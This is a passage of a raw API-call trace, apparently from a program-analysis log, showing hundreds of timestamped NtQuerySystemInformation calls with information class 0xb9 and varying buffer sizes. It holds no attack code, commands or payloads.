NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbc0, Length=0x20, ResultLength=0x0) [0288.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbc0, Length=0x20, ResultLength=0x0) [0288.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbc0, Length=0x20, ResultLength=0x0) [0288.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdb0, Length=0x38, ResultLength=0x0) [0288.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc40, Length=0x20, ResultLength=0x0) [0288.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbc0, Length=0x20, ResultLength=0x0) [0288.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbc0, Length=0x20, ResultLength=0x0) [0288.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbc0, Length=0x20, ResultLength=0x0) [0288.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdb0, Length=0x38, ResultLength=0x0) [0288.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc40, Length=0x20, ResultLength=0x0) [0288.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbd0, Length=0x20, ResultLength=0x0) [0288.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbd0, Length=0x20, ResultLength=0x0) [0288.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ced8, Length=0x58, ResultLength=0x0) [0288.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cda0, Length=0x58, ResultLength=0x0) [0288.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccc0, Length=0x38, ResultLength=0x0) [0288.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207caf0, Length=0x28, ResultLength=0x0) [0288.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207caf0, Length=0x28, ResultLength=0x0) [0288.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207caf0, Length=0x28, ResultLength=0x0) [0288.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207caf0, Length=0x28, ResultLength=0x0) [0288.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.522] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb60, Length=0x28, ResultLength=0x0) [0288.522] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.522] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.522] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccc0, Length=0x38, ResultLength=0x0) [0288.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x28, ResultLength=0x0) [0288.528] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.528] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.529] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.529] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.529] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.529] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x28, ResultLength=0x0) [0288.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccc0, Length=0x38, ResultLength=0x0) [0288.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb40, Length=0x20, ResultLength=0x0) [0288.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cac0, Length=0x20, ResultLength=0x0) [0288.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cac0, Length=0x20, ResultLength=0x0) [0288.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cac0, Length=0x20, ResultLength=0x0) [0288.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccc0, Length=0x38, ResultLength=0x0) [0288.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb40, Length=0x20, ResultLength=0x0) [0288.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cad0, Length=0x20, ResultLength=0x0) [0288.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cad0, Length=0x20, ResultLength=0x0) [0288.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cda0, Length=0x58, ResultLength=0x0) [0288.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccc0, Length=0x38, ResultLength=0x0) [0288.537] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.537] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207caf0, Length=0x28, ResultLength=0x0) [0288.538] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.538] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.538] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207caf0, Length=0x28, ResultLength=0x0) [0288.538] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.538] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.539] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207caf0, Length=0x28, ResultLength=0x0) [0288.539] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.539] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.539] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207caf0, Length=0x28, ResultLength=0x0) [0288.539] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.539] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.540] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb60, Length=0x28, ResultLength=0x0) [0288.540] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.540] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.540] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccc0, Length=0x38, ResultLength=0x0) [0288.540] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.540] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x28, ResultLength=0x0) [0288.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x28, ResultLength=0x0) [0288.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca80, Length=0x20, ResultLength=0x0) [0288.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca00, Length=0x20, ResultLength=0x0) [0288.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca00, Length=0x20, ResultLength=0x0) [0288.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca00, Length=0x20, ResultLength=0x0) [0288.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccc0, Length=0x38, ResultLength=0x0) [0288.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccc0, Length=0x38, ResultLength=0x0) [0288.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb40, Length=0x20, ResultLength=0x0) [0288.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cad0, Length=0x20, ResultLength=0x0) [0288.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cad0, Length=0x20, ResultLength=0x0) [0288.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.551] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.551] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.551] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.551] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.551] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cda0, Length=0x58, ResultLength=0x0) [0288.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccc0, Length=0x38, ResultLength=0x0) [0288.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207caf0, Length=0x28, ResultLength=0x0) [0288.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207caf0, Length=0x28, ResultLength=0x0) [0288.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207caf0, Length=0x28, ResultLength=0x0) [0288.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207caf0, Length=0x28, ResultLength=0x0) [0288.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb60, Length=0x28, ResultLength=0x0) [0288.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccc0, Length=0x38, ResultLength=0x0) [0288.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x28, ResultLength=0x0) [0288.563] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.563] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.563] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.563] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.563] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.563] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x28, ResultLength=0x0) [0288.563] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.563] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccc0, Length=0x38, ResultLength=0x0) [0288.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb40, Length=0x20, ResultLength=0x0) [0288.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cac0, Length=0x20, ResultLength=0x0) [0288.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cac0, Length=0x20, ResultLength=0x0) [0288.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cac0, Length=0x20, ResultLength=0x0) [0288.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccc0, Length=0x38, ResultLength=0x0) [0288.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb40, Length=0x20, ResultLength=0x0) [0288.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cad0, Length=0x20, ResultLength=0x0) [0288.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cad0, Length=0x20, ResultLength=0x0) [0288.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cda0, Length=0x58, ResultLength=0x0) [0288.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc80, Length=0x38, ResultLength=0x0) [0288.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cac0, Length=0x28, ResultLength=0x0) [0288.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.576] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.576] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cac0, Length=0x28, ResultLength=0x0) [0288.576] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.576] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.576] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cac0, Length=0x28, ResultLength=0x0) [0288.576] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.576] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.577] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cac0, Length=0x28, ResultLength=0x0) [0288.577] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.577] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.577] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb30, Length=0x28, ResultLength=0x0) [0288.577] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.577] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.577] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc80, Length=0x38, ResultLength=0x0) [0288.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc80, Length=0x38, ResultLength=0x0) [0288.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbb0, Length=0x28, ResultLength=0x0) [0288.581] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.581] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.582] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.582] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.582] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.582] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbb0, Length=0x28, ResultLength=0x0) [0288.582] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.582] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.582] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc80, Length=0x38, ResultLength=0x0) [0288.583] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.583] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc80, Length=0x38, ResultLength=0x0) [0288.583] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.583] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.583] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.583] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca20, Length=0x20, ResultLength=0x0) [0288.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9a0, Length=0x20, ResultLength=0x0) [0288.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9a0, Length=0x20, ResultLength=0x0) [0288.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9a0, Length=0x20, ResultLength=0x0) [0288.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.584] NtQuerySystemInformation 